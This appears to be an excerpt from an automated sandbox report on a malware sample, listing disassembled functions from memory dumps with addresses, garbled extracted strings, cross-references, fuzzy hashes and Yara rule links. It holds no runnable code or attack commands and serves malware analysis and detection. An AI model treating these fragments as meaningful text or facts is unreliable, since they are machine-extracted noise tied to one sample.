Opcode Fuzzy Hash: bfbdd2f4eb40b0c99f42f083f1dd3dcee64ae0e50d961520efab8e0958816b30
Instruction Fuzzy Hash: 8D519E33A043044BD328AF689C46396BA8BEFC1310F1BC1399945EB3E6ED748C0547C6

Function 00830FF7 Relevance: 10.5, Strings: 8, Instructions: 470COMMON

Download Yara Rule

Strings

%K9U, xrefs: 008311A5
>C;M, xrefs: 00831195
>C;M"G3A, xrefs: 0083144A
?S2], xrefs: 008311B5
<O)I, xrefs: 0083119D
2W<Q, xrefs: 008311AD
"G3A, xrefs: 0083128D
?_%Y, xrefs: 008311BD

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
API String ID: 0-2668584225
Opcode ID: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
Instruction ID: 4a1d4af9b829ce905a0f7d4e11d834d6cac822a683f640b8109c934cba689df2
Opcode Fuzzy Hash: 16124e3c7090e407d3ed762d4f9537a2d591ac8c3946b942d40811c92b540754
Instruction Fuzzy Hash: 3FE1F0715083108BC728DF64C89666BB7F2FFD6714F098A1CE4D68B390E7389905CB96

Function 00420D90 Relevance: 10.5, Strings: 8, Instructions: 470COMMON

Download Yara Rule

Strings

?_%Y, xrefs: 00420F56
%K9U, xrefs: 00420F3E
>C;M"G3A, xrefs: 004211E3
"G3A, xrefs: 00421026
<O)I, xrefs: 00420F36
?S2], xrefs: 00420F4E
>C;M, xrefs: 00420F2E
2W<Q, xrefs: 00420F46

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: "G3A$%K9U$2W<Q$<O)I$>C;M$>C;M"G3A$?S2]$?_%Y
API String ID: 0-2668584225
Opcode ID: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
Instruction ID: 1eff8263789fd2a08f3fecf0f268f16acf59bb1ac0ae24da522a1f75b62227ff
Opcode Fuzzy Hash: d10a81d34372c35a96c2f8986c5506c0c6912e9abd80cece7959baf4c885c2f5
Instruction Fuzzy Hash: 28E101756083108BC324CF64C89276BB7F1EFE6314F498A5DE4D69B3A4E3389905CB96

Function 00427860 Relevance: 10.4, Strings: 8, Instructions: 409COMMON

Download Yara Rule

Strings

J+, xrefs: 004279D3
bX_^, xrefs: 00427C10, 00427C14, 00427D78
JW, xrefs: 004279BD
3=, xrefs: 0042795C
r}B, xrefs: 00427D60
+5, xrefs: 0042794C
]_, xrefs: 004279C8
/), xrefs: 00427944

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: J+$JW$]_$bX_^$r}B$+5$/)$3=
API String ID: 0-2499027453
Opcode ID: 4c0af34b32b00f199e8576f8f85db05e1f08e8820f275a94fa28dd47a3927fbb
Instruction ID: 44c300c69855992b2f16a9d4ad0dfeec6e614c77fc8171f72a5c7ce453eec0d9
Opcode Fuzzy Hash: 4c0af34b32b00f199e8576f8f85db05e1f08e8820f275a94fa28dd47a3927fbb
Instruction Fuzzy Hash: 9FD1DEB461C340DFE7249F25E881B6BB7A2FBC6304F94892DF1858B391DB749805CB5A

Function 004186FC Relevance: 8.5, Strings: 6, Instructions: 1000COMMON

Download Yara Rule

Strings

H)G+, xrefs: 00418852
]a_c, xrefs: 00418871
+, xrefs: 00418DD8
tu, xrefs: 00418829
NmNo, xrefs: 004188F5
<, xrefs: 0041913F

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: +$<$H)G+$NmNo$]a_c$tu
API String ID: 0-4096164410
Opcode ID: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
Instruction ID: c7a3f77f71ded0b9311dc6516a729683f4fb7c759b6558f4b3eb03d829b5ec1a
Opcode Fuzzy Hash: 00c84f4a00f370efcd5a995a9a9107818abea52a60fb4f74658ed92934ea930d
Instruction Fuzzy Hash: 925216741093509FD724CF28C8917ABB7E1FF86314F184A6DE4D68B391DB38A845CB9A

Function 0081B097 Relevance: 7.8, Strings: 6, Instructions: 344COMMON

Download Yara Rule

Strings

Ds, xrefs: 0081B14F
:33F, xrefs: 0081B30B
8)*6, xrefs: 0081B499, 0081B2EB, 0081B490, 0081B4C3, 0081B42A, 0081B2CB, 0081B41E, 0081B47C
}v, xrefs: 0081B13F
]f, xrefs: 0081B288, 0081B28C
8)*6, xrefs: 0081B317

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 8)*6$8)*6$:33F$Ds$]f$}v
API String ID: 0-771823803
Opcode ID: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
Instruction ID: 65fe46886adb07226fac804380b30bf40fc7114e8bd6eeae88f5748a4cb6994d
Opcode Fuzzy Hash: 50f1edfc2bafa0014d11b6723b84b375855532d8b2d3c37a471b1a8907bb870b
Instruction Fuzzy Hash: D7B1F07520C3908BD324CF6984506AFBBE5EFC2314F58C92CE8E58B352D775894ACB5A

Function 0040AE30 Relevance: 7.8, Strings: 6, Instructions: 344COMMON

Download Yara Rule

Strings

8)*6, xrefs: 0040B0B0
8)*6, xrefs: 0040B25C, 0040B1C3, 0040B1B7, 0040B215, 0040B232, 0040B064, 0040B084, 0040B229
}v, xrefs: 0040AED8
:33F, xrefs: 0040B0A4
]f, xrefs: 0040B021, 0040B025
Ds, xrefs: 0040AEE8

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 8)*6$8)*6$:33F$Ds$]f$}v
API String ID: 0-771823803
Opcode ID: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
Instruction ID: 415c6ff438417329eae15ed8e7d658c137838348542c9c9b1d71c747cb23f456
Opcode Fuzzy Hash: 7a3e19719626faba5c99d689b52e2aeecc2c57281bd7adea87c94ef03e1a3679
Instruction Fuzzy Hash: 88B1F67520C3408BD324CF6884546AFBBE1EFD2304F18896DE8D56B391D779890ACB9E

Function 00425AF0 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

K3, xrefs: 00425C4A
C@, xrefs: 00425C40
)RSP, xrefs: 004259A1
bX_^, xrefs: 00425BBD
B:, xrefs: 00425C36
=^"\, xrefs: 00425ABF

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: )RSP$=^"\$B:$C@$K3$bX_^
API String ID: 0-3030200349
Opcode ID: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction ID: 361e1606381cfafdf419846c5dd42b56ab67650ac9a68572a77bc4f7112e5621
Opcode Fuzzy Hash: b7b7d5e1b28ee3cbee9031abf066d5bdbea60043203f55f78b2bc464f190e4c2
Instruction Fuzzy Hash: 77B120B6E002288FDB20CF68DC427DEBBB1FB85314F1981A9E418AB351D7785D468F91

Function 0084F3B7 Relevance: 6.8, Strings: 5, Instructions: 524COMMON

Download Yara Rule

Strings

d5fg, xrefs: 0084F456
S"(w, xrefs: 0084F487
f, xrefs: 0084F614
S"(w, xrefs: 0084F6B3
d5fg, xrefs: 0084F3FC, 0084F417

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: S"(w$S"(w$d5fg$d5fg$f
API String ID: 0-2961185688
Opcode ID: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
Instruction ID: baad3bc6f6fb0976322080b396fb54ab94be9e6cd14e0e845f5f305955ab27ab
Opcode Fuzzy Hash: 0d95f729ef3d477b1c9e30a1fac3cff8fc80ecb0f431d978f2f91dfa0851ceaa
Instruction Fuzzy Hash: 4712A2716093659FC714CF18C880B2ABBE1FFC5318F19863CE5A59B392D771AC058B96

Function 0043F150 Relevance: 6.8, Strings: 5, Instructions: 524COMMON

Download Yara Rule

Strings

S"(w, xrefs: 0043F220
f, xrefs: 0043F3AD
d5fg, xrefs: 0043F1EF
S"(w, xrefs: 0043F44C
d5fg, xrefs: 0043F1B0, 0043F195

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID: InitializeThunk
String ID: S"(w$S"(w$d5fg$d5fg$f
API String ID: 2994545307-2961185688
Opcode ID: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
Instruction ID: d96f39f5747abd94facca9cdfd6dc8715fedad9b00cb7f1fec3a1bbed5632043
Opcode Fuzzy Hash: 0d78e0e6ed5534702665f3e437abebaaa5f5fc6afa26a53d6cab4ff82d69c05f
Instruction Fuzzy Hash: E812C575A093519FC724CF18C880B2BB7E1AFC9314F18963EE8A4573A1D775DC098B9A

Function 00428437 Relevance: 6.7, Strings: 5, Instructions: 469COMMON

Download Yara Rule

Strings

LMR|, xrefs: 00428848
vu~r, xrefs: 00428868
J'N!, xrefs: 00428B3B
H}}C, xrefs: 00428850
"#, xrefs: 00428B43

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: "#$H}}C$J'N!$LMR|$vu~r
API String ID: 0-1530353048
Opcode ID: e45dd4541cc99e9a4530162f6031e7d96b64c6dfa3350a04461e826158a1452a
Instruction ID: 7cb9c3f936be8fd3a75d1e4abfb2bd6291e29c03686ec294c1ddfd7f13708a2f
Opcode Fuzzy Hash: e45dd4541cc99e9a4530162f6031e7d96b64c6dfa3350a04461e826158a1452a
Instruction Fuzzy Hash: 0DE16CB5608351CFC7108F24A84126FB7E1AF96308F58487EE8C597342DB39DC05CB5A

Function 00814517 Relevance: 6.7, Strings: 5, Instructions: 464COMMON

Download Yara Rule

Strings

), xrefs: 00814594
), xrefs: 0081459E
IEND, xrefs: 008149F6
IHDR, xrefs: 00814913
IDAT, xrefs: 00814982

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
Instruction ID: 78805f7d3fd83830e687e40f2f8c5396436214c9eb39641ae6b758155333ff7d
Opcode Fuzzy Hash: 6404abdd9532a83599bde1e91a6e17757f4bdc3d0c3ecb42acbc60988de959d0
Instruction Fuzzy Hash: 540212746083848FE704CF28C891BAABBE5FFC6304F14862DE9858B391D375D949CB96

Function 004042B0 Relevance: 6.7, Strings: 5, Instructions: 464COMMON

Download Yara Rule

Strings

IDAT, xrefs: 0040471B
), xrefs: 00404337
), xrefs: 0040432D
IEND, xrefs: 0040478F
IHDR, xrefs: 004046AC

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
Instruction ID: 257f26cc5f2a74aac9bf87ca9c2577b9cb81d69ed2dc1e03b5bd0bdbb9992778
Opcode Fuzzy Hash: f372f4cb5f00298efd3fc4362282583120594c95e814c0bcfa2cf688d961bdd6
Instruction Fuzzy Hash: C302E2B46083848FD704CF29D89176ABBE1EBC6304F14853EEA859B3D1D379D909CB96

Function 00819507 Relevance: 6.7, Strings: 5, Instructions: 452COMMON

Download Yara Rule

Strings

!oW1, xrefs: 00819631
RRP\, xrefs: 008199A5
C, xrefs: 00819874
#"2., xrefs: 00819629
P, xrefs: 008196F2

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: !oW1$#"2.$C$P$RRP\
API String ID: 0-2182630447
Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction ID: 3813b4d4a3046f5ce41e6dfe4e6a2ff25b231c771904fd7f4843eb1624369123
Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction Fuzzy Hash: 25C1F57121C3914BD3158F29C4A17ABBFE2EFD3204F18896DE4D58B382D779854AC792

Function 004092A0 Relevance: 6.7, Strings: 5, Instructions: 452COMMON

Download Yara Rule

Strings

RRP\, xrefs: 0040973E
!oW1, xrefs: 004093CA
P, xrefs: 0040948B
C, xrefs: 0040960D
#"2., xrefs: 004093C2

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: !oW1$#"2.$C$P$RRP\
API String ID: 0-2182630447
Opcode ID: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction ID: 099b8e97d4c783248d299f08155666f1876e613e1bac2d45a50adfc1c6749069
Opcode Fuzzy Hash: 9e5b2cc2ab5d07adaa8a414532c7643901df2a50596dff6e5731d4bc268ab305
Instruction Fuzzy Hash: B8C1167221C3918BD3258F29D49076BBFE2AFD3304F18896DE4D44B3C6D679890AC796

Function 008199F7 Relevance: 6.7, Strings: 5, Instructions: 415COMMON

Download Yara Rule

Strings

{u, xrefs: 00819CE5
*+, xrefs: 00819D85
nz, xrefs: 00819B4A
kh, xrefs: 00819E4A
FF468920BFFA1172D0632DF0E28DC412, xrefs: 00819A93

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: *+$FF468920BFFA1172D0632DF0E28DC412$kh$nz${u
API String ID: 0-3161506991
Opcode ID: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
Instruction ID: cad536994bb7e2a92703526d9684fcb60a5a4e77e7bc39f458b77d8ce76ce8a4
Opcode Fuzzy Hash: 2082c0a74a3eb7ff3a029c135b348d841f3ea5b4eda3e8b99a1f11572f93b6ec
Instruction Fuzzy Hash: 60D1F3716083508BD724DF38C8A1AABBBE6EFC1318F18896DE4D6CB391D674C449CB46

Function 0083A305 Relevance: 6.7, Strings: 5, Instructions: 407COMMON

Download Yara Rule

Strings

ooKv, xrefs: 0083A5CA
,fbV, xrefs: 0083A5BA
d~`}, xrefs: 0083A5C2
sf, xrefs: 0083A5D2
lvhu, xrefs: 0083A5B2

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: ,fbV$d~`}$lvhu$ooKv$sf
API String ID: 0-4157365443
Opcode ID: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
Instruction ID: 257d7ccdf3d5d05a5b5ad3d6b32157e2457608dbdcd79088536ab3a76391f796
Opcode Fuzzy Hash: ac8608a635378d5c383f0645017db4dbb6ad6197584878f05415f6d5cdf6d11e
Instruction Fuzzy Hash: D3D107B15083514BD724CF18C8917ABBBE2FFD5314F08892CE5D58B242E679DA09C787

Function 0083FF23 Relevance: 5.3, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

t, xrefs: 0083FF33
_Pna, xrefs: 0083FF8D
mc, xrefs: 00840060
BVAI, xrefs: 008401D1

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: BVAI$_Pna$mc$t
API String ID: 0-1770441902
Opcode ID: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
Instruction ID: 99ea88f117ea4776347713b85d550395858f31fd3bf2261eb209277979bb6e48
Opcode Fuzzy Hash: 20e5745e1b694ac32ec1dc69cbed19167deee9fde80c6a8e98dc18cec2597528
Instruction Fuzzy Hash: EDA1A17050D3C18AE739CF2984107ABBBE1AFD7304F1889ADD0D997282DB79854ACB56

Function 0042FCBC Relevance: 5.3, Strings: 4, Instructions: 335COMMON

Download Yara Rule

Strings

mc, xrefs: 0042FDF9
_Pna, xrefs: 0042FD26
t, xrefs: 0042FCCC
BVAI, xrefs: 0042FF6A

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: BVAI$_Pna$mc$t
API String ID: 0-1770441902
Opcode ID: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
Instruction ID: 048c6723a0782cba0ed5f5bfde42b0dc355c8231af3653691a455654dcaa2d5e
Opcode Fuzzy Hash: a6be79c1421af0b4b0c922728e2635db4fbde982ee4162c8bdd7ea1edf433783
Instruction Fuzzy Hash: 03A1C37050C3D18AE739CF2594103ABBBE1AFD7304F58897ED0D997382DB79814A8B5A

Function 0083ECC9 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

0, xrefs: 0083EF67
4b, xrefs: 0083F041
8<j?, xrefs: 0083EFB7
D, xrefs: 0083EFCF

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: e2328914d7729c1255620f27df3788c759b9fb55fc27f8747b0f1aad8f65d762
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 8491176120C3818BD719CF3988A137AFBD1EFD6318F28896DE4D6CB292D679C409C756

Function 0042EA62 Relevance: 5.3, Strings: 4, Instructions: 331COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
D, xrefs: 0042ED68
0, xrefs: 0042ED00
8<j?, xrefs: 0042ED50

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 0$8<j?$D$4b
API String ID: 0-1320392364
Opcode ID: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction ID: 2b7b52935a6d5b5a4047c1575b3543403dadbc3efec4758ce9a79863674c7261
Opcode Fuzzy Hash: c5bccc6a1462223a6a16399cddfc4de50993b4880fcb804883e5cf7c287459bb
Instruction Fuzzy Hash: 9F91F66030C3918BD718CF3A946136BBBD19FD6314F69896EE4D68B391D23CC406871A

Function 0042A9F7 Relevance: 5.3, Strings: 4, Instructions: 328COMMON

Download Yara Rule

Strings

zi, xrefs: 0042AE8C
bt, xrefs: 0042AE84
v, xrefs: 0042AE45, 0042AD90, 0042ADD1, 0042AE5D, 0042AC34, 0042AB80, 0042ABC1, 0042AC4B
v, xrefs: 0042ACB0

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: v$v$bt$zi
API String ID: 0-1945541540
Opcode ID: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
Instruction ID: bba7ce1cbd9d7b5964ace128991244c7d88d52c60c2cfa081a52f8c92ce1e01e
Opcode Fuzzy Hash: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
Instruction Fuzzy Hash: 48D1687260C3558FD725CF28D45069FFBE6EBC4304F06892DE8A99B281D774D60ACB86

Function 0041BBA0 Relevance: 5.3, Strings: 4, Instructions: 325COMMON

Download Yara Rule

Strings

9HiN, xrefs: 0041BD21
,D,J, xrefs: 0041BD19
'P0V, xrefs: 0041BD31
WT, xrefs: 0041BD39

Memory Dump Source

Source File: 00000000.00000002.1929826326.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1929826326.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q7QR4k52HL.jbxd

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86

Function 0082BE2C Relevance: 5.2, Strings: 4, Instructions: 223COMMON

Download Yara Rule

Strings

WT, xrefs: 0082BFA0
9HiN, xrefs: 0082BF88
'P0V, xrefs: 0082BF98
,D,J, xrefs: 0082BF80

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
Instruction ID: 27f8274cf7165881daa96f92fb3dccdda81dbbf478c8c7a41a34188cc8eb5869
Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
Instruction Fuzzy Hash: 4571D0B554D3A58BD304CF12D8802AFBBE2FBD1314F598E2CF1D85B252C739854A8B82

Function 008373B2 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

UUQg, xrefs: 0083758A
KGFU, xrefs: 0083757C
FOOE, xrefs: 0083756E
KGFU, xrefs: 00837628, 0083762B

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: FOOE$KGFU$KGFU$UUQg
API String ID: 0-60738199
Opcode ID: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
Instruction ID: d9f3e6d0aac05cea008bb49aeeea709222d970cc88f9801ab3af9bfb17288ab2
Opcode Fuzzy Hash: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
Instruction Fuzzy Hash: 0D517DF29496568FD7348B68C8401A9FBA2FF95320F1D4669C855CB381E374ED01D7D1

Function 00835D57 Relevance: 5.1, Strings: 4, Instructions: 132COMMON

Download Yara Rule

Strings

bX_^, xrefs: 00835E24
K3, xrefs: 00835EB1
C@, xrefs: 00835EA7
B:, xrefs: 00835E9D

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: B:$C@$K3$bX_^
API String ID: 0-595269213
Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
Instruction ID: 52fccc3af1c2fd7bbda646dd1d84f6165dd170b726fec28f8c7da27cb872f49d
Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
Instruction Fuzzy Hash: 7441CEB5D102289BDB20DF79CD827DDBFB1AB85300F4442AAE448A7295D6340E898FD2

Function 008320D7 Relevance: 4.2, Strings: 3, Instructions: 435COMMON

Download Yara Rule

Strings

au`c, xrefs: 0083222D
(ijkdefgau`c, xrefs: 00832225
defgau`c, xrefs: 00832231

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: (ijkdefgau`c$au`c$defgau`c
API String ID: 0-3415814675
Opcode ID: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
Instruction ID: f9838e98748488cc55be6661e39e806931cd1d387277a11703f40ff3c2069457
Opcode Fuzzy Hash: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
Instruction Fuzzy Hash: BBD1BDB16083408BD714DF28C891A6BBBE5FFC5318F18892CE986CB391E775D845CB92

Function 00844F56 Relevance: 4.2, Strings: 3, Instructions: 429COMMON

Download Yara Rule

Strings

K, xrefs: 00845045
., xrefs: 00845049
$, xrefs: 0084504D

Memory Dump Source

Source File: 00000000.00000002.1930228684.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_Q7QR4k52HL.jbxd

Yara matches

Similarity

API ID:
String ID: $$.$K
API String ID: 0-4278605028
Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
